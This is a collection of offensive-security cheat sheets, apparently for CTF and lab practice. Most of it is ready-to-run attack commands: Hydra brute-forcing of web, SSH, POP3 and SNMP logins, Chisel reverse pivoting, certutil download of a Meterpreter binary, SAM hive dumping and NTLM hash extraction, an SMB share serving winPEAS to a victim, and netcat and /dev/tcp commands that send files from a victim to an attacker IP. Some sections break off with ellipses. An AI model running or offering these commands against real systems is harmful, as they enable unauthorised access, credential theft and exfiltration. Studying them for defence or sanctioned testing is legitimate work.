Cheatsheets

Hydra is a powerful tool used for performing brute-force attacks on various services. In this tutorial, we’ll explore brute-forcing login pages using different HTTP methods with Hydra. Brute Force Login Page with HTTP GET Method: hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt $IP http-get /manager/html -s 8080 hydra -C $PAYLOADS/SecLists/Passwords/Default-Credentials/tomcat-betterdefaultpasslist.txt http-get://$IP:8080/manager/html Initiates the Hydra tool and specifies the target URL using the HTTP GET method. Brute Force Login Page with HTTP POST Method: hydra -l darren -P /usr/share/dict/rockyou.txt 10.10.69.229 http-post-form '/:user=^USER^&pass=^PASS^:F=Error: Invalid username or password' -s 8088 hydra -l '' -P 3_digit_pin.txt $IP http-form-post '/login.php:pin=^PASS^:F=Access denied' -s 8000 -v -f Initiates the Hydra tool and specifies the target URL using the HTTP POST method. Brute Force Credentials of POP3 Protocol: hydra -l doak -P /usr/share/dict/fasttrack.txt pop3://$IP -s 55007 Brute Force Credentials of SSH Protocol: hydra -l meliodas -P /usr/share/dict/rockyou.txt ssh://$IP Brute Force Credentials of SNMP Protocol: hydra -P /usr/share/seclists/Discovery/SNMP/snmp-onesixtyone.txt snmp://10.10.152.137 Hydra Options Explained: -C <file>: Specifies the path to the file containing a list of username and password combinations. i.e, admin:admin -L <username file>: Specifies the path to a file containing a list of usernames. -l <username>: Specifies a single username to use for the brute-force attack. -P <password file>: Specifies the path to a file containing a list of passwords. -p <password>: Specifies a single password to use for the brute-force attack. -f / -F : exit when a login/pass pair is found (-M: -f per host, -F global) $IP: Represents the IP address of the target. -s <port>: Specifies the target port. http-get: Initiates a brute-force attack using the HTTP GET method. http-post-form: Initiates a brute-force attack using the HTTP POST method with form parameters. pop3://<IP>: Specifies the POP3 protocol and target IP address. ssh://<IP>: Specifies the SSH protocol and target IP address. snmp://<IP>: Specifies the SNMP protocol and target IP address. Additional flags and options may be included for more detailed configuration and verbose output.

🧠 What is Chisel? Chisel is a fast TCP/UDP tunnel over HTTP, useful for port forwarding and pivoting, especially during red teaming or CTFs. 🔥 Attacker Machine Setup (Chisel Server) Start Chisel in reverse mode on the attacker machine: ./chisel_1.5.1 server -p 9005 --reverse -p 9005: Listen on port 9005 --reverse: Accept reverse port forwarding connections 🎯 Target Machine Setup (Chisel Client) Forward all traffic to attacker: ./chisel client 10.10.14.19:9005 R:socks This sets up a SOCKS proxy from the target to the attacker’s Chisel server ...

Method 1: Using an HTTP Server Step 1: Start an HTTP server on Linux Open a terminal on your Linux machine and run: sudo python3 -m http.server 80 Step 2: Download the file using certutil on Windows Open Command Prompt or PowerShell on your Windows machine and run: certutil.exe -urlcache -split -f "http://10.10.14.7/msf.exe" Method 2: Using Invoke-WebRequest Step 1: Start an HTTP server on Linux Same as Step 1 in Method 1. Step 2: Download the file using Invoke-WebRequest on Windows Open PowerShell on your Windows machine and run: ...

Step 1: Save Registry Hives (SAM, SECURITY, SYSTEM) Run these commands on the target Windows machine: reg.exe save hklm\sam sam reg.exe save hklm\security security reg.exe save hklm\system system These commands save the SAM, SECURITY, and SYSTEM hives as files in the current directory. 📂 Copy these files to your attacker machine for offline cracking. Step 2: Extract Hashes from Saved Files Two popular tools to extract NTLM hashes: Using samdump2: samdump2 ./system ./sam Using Impacket’s secretsdump.py: secretsdump.py -sam sam -system system LOCAL Sample Output Explained Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450::: 👤 Username (e.g., Administrator) 🆔 User RID/Group (e.g., 500) 🔐 LM hash (usually empty/disabled) 🗝️ NT hash (this is what you crack) 🛠️ Step 3: Crack NTLM Hashes Extract NT hashes (4th field) and save in hashes.txt: ...

1. Directory and File Brute Forcing Basic Directory Fuzzing: ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ/ Fuzz common directory names (e.g., /admin/, /uploads/). 2. Fuzzing Parameters Basic Parameter Fuzzing: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ Replaces FUZZ with words from the wordlist to test URL parameters. Filter by Status Code: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -mc 200 Shows responses only for the 200 OK status code. Filter by Content Size: ffuf -w wordlist.txt -u https://example.com/page.php?param=FUZZ -fs 150 Filters results based on exact response size in bytes. Fuzzing with JSON Payload (for APIs): ...

🖥️ On the Linux Server (Attacker Machine) Start an SMB server using impacket-smbserver: sudo smbserver.py gnu $(pwd) -smb2support gnu: Share name $(pwd): Current working directory to be shared -smb2support: Enables SMB2 support for better compatibility with newer Windows systems 🪟 On the Windows Client (Victim Machine) Access the shared file using UNC path: \\10.10.14.42\gnu\winPEAS.exe 🔸 Replace 10.10.14.42 with the IP of your Linux (attacker) machine 🔸 You can also map this as a network drive or copy files directly using copy or xcopy in CMD or PowerShell ...

📤 Uploading/Sending a Directory from Local to SSH Server Use either of the following commands: scp -P 22 -r ./shell/* [email protected]:/home/gnu/shell/ OR scp -r -P 22 ./shell [email protected]:/home/gnu/shell/ 📥 Downloading/Receiving a Directory from SSH Server to Local scp -P 22 -r [email protected]:/home/gnu/* ./gnu/ OR scp -r -P 22 [email protected]:/home/gnu ./gnu/ 📤 Uploading/Sending a File from Local to SSH Server scp -P 22 ./shell.php [email protected]:/home/gnu/shell.php 📥 Downloading/Receiving a File from SSH Server to Local scp -P 22 [email protected]:/home/gnu/flag.txt ./flag.txt 📝 Note: ...

🖥️ Step 1: Start Listening on Local Machine (Kali) Run the following command to start listening for incoming files: nc -lp 4444 > filename # waiting for receiving the files 📤 Step 2: Transfer File from Remote Machine (Victim) Run this command on the victim machine to send the file: nc -w 3 10.10.14.19 4444 < filename # it's time to send the file OR, use this alternative method: cat filename > /dev/tcp/10.10.14.19/4444 Note: 10.10.14.19 is the IP address of the local machine (tun0). ...

🧰 Using ftp Command 1. Connect to FTP Server Replace 10.10.10.98 with your target FTP server IP or domain: ftp 10.10.10.98 2. Login as Anonymous Name (10.10.10.98:yourusername): anonymous Password: (press Enter) 3. Set Binary Mode To handle all types of files properly: ftp> binary 4. Disable Prompting (for Multiple Files) ftp> prompt off Interactive mode off. 5. Download Files (Wildcard) ftp> mget * ⚠️ Note: Standard ftp does not support recursive download. For recursive download, use a better client like lftp. ...

Execution control F7 runs step into so it enters the next function F8 runs step over so it goes to next instruction without entering function F9 runs continue process until breakpoint or crash Ctrl + F2 stops the debugger Ctrl + F9 restarts the process Breakpoints F2 toggles breakpoint on current line Shift + F2 deletes all breakpoints Alt + B opens breakpoint list Navigation during debug EIP RIP highlighted shows current instruction Space switches graph view and linear view G jumps to address Esc goes back Registers and memory Alt + R opens registers window Alt + M opens memory window Alt + S opens stack view Ctrl + Alt + R refreshes registers Practical CTF flow Press F9 to run program Hit F2 on main or check function Use F8 to trace logic Use F7 only when entering crypto or check routine Watch registers and stack Laptop Friendly Tip If F keys are painful then remap: ...